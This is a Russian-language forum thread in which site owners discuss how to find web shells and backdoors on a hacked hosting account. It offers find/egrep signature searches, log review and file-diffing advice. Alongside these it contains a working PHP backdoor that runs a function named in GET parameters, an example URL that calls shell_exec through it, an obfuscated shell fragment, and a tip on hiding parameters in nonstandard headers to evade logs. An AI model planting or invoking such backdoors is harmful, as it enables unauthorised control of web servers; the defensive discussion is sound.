Как проверить хостинг на шелы и т.п.?

[Dem0kratizat0r]

Задолбали ломать один из моих хостингов.
Как бы проверить его ? Есть какой-то сервис проверки на залитые шелы и прочую дрянь ?

[masolit]

так и есть ) бывают шеллы вообще без единой функции ) просто типа набор слов рандомных ) их даже sucuri не находит

[editeur]

Тяжело будет найти такой бэкдор:

Код:

$fun = $_GET["fun"];
$name = $_GET["name"];
$param = $_GET["param"];
if ($fun) {
    $fun($name, $param);
}

вызывается например так

Код:

site.com/index.php?fun=call_user_func&name=shell_exec&param=echo some evil code > huy.php

Это так, первое что в голову пришло

[Hector]

Цитата:

Сообщение от Alexsize

find . -size +40k -type f -name *.php -exec egrep -l 'gzinflate' {} \;
find . -size +1k -type f -name *.php -exec egrep -l 'cmd' {} \;
find . -size +20k -type f -name *.php -exec egrep -l 'WSO' {} \;

Вписываете нужный паттерн, комбинируете и тд.
Удачи )

Расшифруйте! И как просканить всю папку рекурсией?

[Hector]

Короче сработало по другому

find -name \*.php -exec egrep -l 'gzinflate' {} \;
и тд

[Alexsize]

Цитата:

Сообщение от Morgul

Alexsize, ну что ты тут рассказываешь, а? если шеллы еще можно найти более-менее, то хитрые бэкдоры, где нет ни единого eval, компрессии и прочего - дохрена и еще чуть-чуть.

Да все можно запрятать, кто спорит? И в базе юзеров незаметно добавить,права поменять и тд.

НО =)

Кому оно нахрен нужно..

Все что я у себя вылавливал - ищется вон теми строчками.

А остальное ручками, логи смотреть, даты палить, если уж совсем заипут, перенастраивать сервак.

Еще раз повторюсь и я в этом убежден - те строчки 90% шеллов отловят.
А универсального софта и способа отлова, как и кнопки БАБЛО, не существует.

Цитата:

Сообщение от editeur

Тяжело будет найти такой бэкдор:

Код:

$fun = $_GET["fun"];
$name = $_GET["name"];
$param = $_GET["param"];
if ($fun) {
    $fun($name, $param);
}

вызывается например так

Код:

site.com/index.php?fun=call_user_func&name=shell_exec&param=echo some evil code > huy.php

Это так, первое что в голову пришло

Очень тяжело, меньше минуты в логах искать буду =)

Цитата:

Сообщение от masolit

так и есть ) бывают шеллы вообще без единой функции ) просто типа набор слов рандомных ) их даже sucuri не находит

Бывают, видел, но на практике не встречал =)

Скинь код в ЛС, затесчу, если интересно.
Попробую традиционным способом найти =)

[ivy]

editeur, shell_exec и прочее легко палится в логах, как и все остальное. Логи то можно не только локально хранить ^^

Цитата:

Сообщение от Hector

Расшифруйте! И как просканить всю папку рекурсией?

man find
В его примере (find . ) find как раз и ищет в текущей директории (не папке и не мамке) и глубже.

[Morgul]

Цитата:

Сообщение от Alexsize

Еще раз повторюсь и я в этом убежден - те строчки 90% шеллов отловят.

отловили, и дальше че? Убил, а на следующий день у тебя снова всё загажено.

[ivy]

Цитата:

Сообщение от Morgul

и дальше че?

А дальше логи смотришь.

[masolit]

Цитата:

Сообщение от Alexsize

Бывают, видел, но на практике не встречал =)

Скинь код в ЛС, затесчу, если интересно.
Попробую традиционным способом найти =)

PHP код:

$fOJhqK='~o'&/*npew84&Ru1Jrj6j9oPC*/'~c';$QXeebJf=('k{'&/* c}@BJvQ,^fwxSF!L:v */cy);/*wPg23gw_${ */$IFwN='~c'/* cUY"wO~2|+jsq~ */&cy;/*qCK9bC5eQu6b2w]&yd&t~o{*/$Iekl=vQ#zRD} 


это кусочек ) найди )) в коде нет ни одной функции

[editeur]

Да не, в логах вы ничего не увидите. Функцию и параметры можно передавать не только в GET параметрах, но и в HTTP заголовках например. Причем в заголовках с нестандартными именами, чтобы их случайно не вывели в логи.
Самый лучший, но не самый простой способ проверять на шелы и бэкдоры - это хранить копию всех исходных файлов всех сайтов на локалхосте и проверять скриптом или git на несовпадающие файлы и новые файлы в каталогах.

Но вообще да, прятаньем бэкдоров мало кто заморачивается.